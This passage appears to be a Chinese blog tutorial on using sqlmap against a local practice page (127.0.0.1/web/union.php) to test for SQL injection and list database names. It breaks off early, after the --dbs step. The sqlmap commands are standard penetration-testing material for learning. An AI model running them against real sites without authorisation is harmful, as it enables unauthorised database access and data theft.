sqlmap自动注入
操作:在cmd下
首先看此url是否存在SQL注入攻击:一定是.php、.jsp、.sap等网站(与数据库存在交互),html页面一定没有SQL注入漏洞
查看网站是否存在注入漏洞:
sqlmap.py -u 127.0.0.1/web/union.php
![id存在注入](https://i-blog.csdnimg.cn/blog_migrate/6d6cad13c965e116f550023d7ddd6dbe.png#pic_center)
如果存在SQL注入,查看注入类型:
sqlmap.py -u 127.0.0.1/web/union.php?id=1
![存在漏洞类型](https://i-blog.csdnimg.cn/blog_migrate/e237fdbff59ac8fde917cee4343d2239.png#pic_center)
1:爆库名
sqlmap.py -u 127.0.0.1/web/union.php?id=1 --dbs
–dbs:数据库(–列出来对应的值有哪些,-加首字母大写后面跟值)
![找到目标数据库](https://i-blog.csdnimg.cn/blog_migrate/53cef25c2cc92c466ab8ce9166e3ef73.png#pic_center)
2&